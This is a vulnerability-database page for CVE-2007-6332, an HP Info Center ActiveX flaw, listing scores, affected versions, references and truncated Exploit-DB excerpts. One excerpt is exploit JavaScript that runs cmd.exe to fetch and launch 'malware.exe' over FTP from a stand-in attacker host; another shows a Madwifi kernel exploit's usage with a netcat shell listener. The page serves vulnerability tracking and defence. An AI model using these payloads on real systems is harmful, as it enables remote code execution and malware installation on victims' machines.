CVE-2007-6332
published 2007-12-13CVE-2007-6332: The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
8.43%
94.3th percentile
The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | info_center | — | — |
| hp | quick_launch_button | <= 6.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP Compaq Notebooks - ActiveX Remote Code Execution
exploitdb·2007-12-11
CVE-2007-6333 HP Compaq Notebooks - ActiveX Remote Code Execution
HP Compaq Notebooks - ActiveX Remote Code Execution
---
var attackersFtpServerAddress="attacker.ftp.server";
var attackersFtpUname="IDidntDoAnything";
var attackersFtpPassword="password";
var executableFileName="malware.exe";
var cnt,p;
function spawn2()
{
o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C echo open "+attackersFtpServerAddress+
" >> c:\\ftpd&echo "+attackersFtpUname+">> c:\\ftpd&echo "+attackersFtpPassword+
">> c:\\ftpd&echo binary>> c:\\ftpd&echo get "+executableFileName+
"c:\\"+executableFileName+" >> c:\\ftpd&echo quit>> c:\\ftpd",0);
o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C echo cd c:\\>> c:\\ftpd.bat"+
"&echo ftp -s:ftpd>> c:\\ftpd.bat&echo start c:\\"+executableFileName+
" >> c:\\ftpd.bat",0);
o2obj.LaunchApp("c:\\windows\\system32\\cmd.exe","/C c:\
Exploit-DB
Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow
exploitdb·2007-03-01
CVE-2006-6332 Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow
Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow
---
/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------
* expoit code by: sgrakkyu antifork.org -- 10/1/2007
*
* CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES)
*
* (for wpa)
* ....
* memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2)
* ....
* ....
* the function re-uses args in the stack before returning so we
* can't trash them overwriting.
* Different compiled module [ex. different version of gcc] may require
* a different pad value.. (see -g option)
*
* ex:
* on one terminal runs: nc -l -p 31337
* phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon
* phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
* phi:~/kexec/lorcon# ifconfig ath1 up
* phi:~/kexec/lorcon# ./ma
No writeups or analysis indexed.
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01300486http://secunia.com/advisories/28055http://securitytracker.com/id?1019086http://www.anspi.pl/~porkythepig/hp-issue/kilokieubasy.txthttp://www.securityfocus.com/archive/1/484880/100/100/threadedhttp://www.securityfocus.com/bid/26823http://www.vupen.com/english/advisories/2007/4192https://exchange.xforce.ibmcloud.com/vulnerabilities/38994https://www.exploit-db.com/exploits/4720http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01300486http://secunia.com/advisories/28055http://securitytracker.com/id?1019086http://www.anspi.pl/~porkythepig/hp-issue/kilokieubasy.txthttp://www.securityfocus.com/archive/1/484880/100/100/threadedhttp://www.securityfocus.com/bid/26823http://www.vupen.com/english/advisories/2007/4192https://exchange.xforce.ibmcloud.com/vulnerabilities/38994https://www.exploit-db.com/exploits/4720
2007-12-13
Published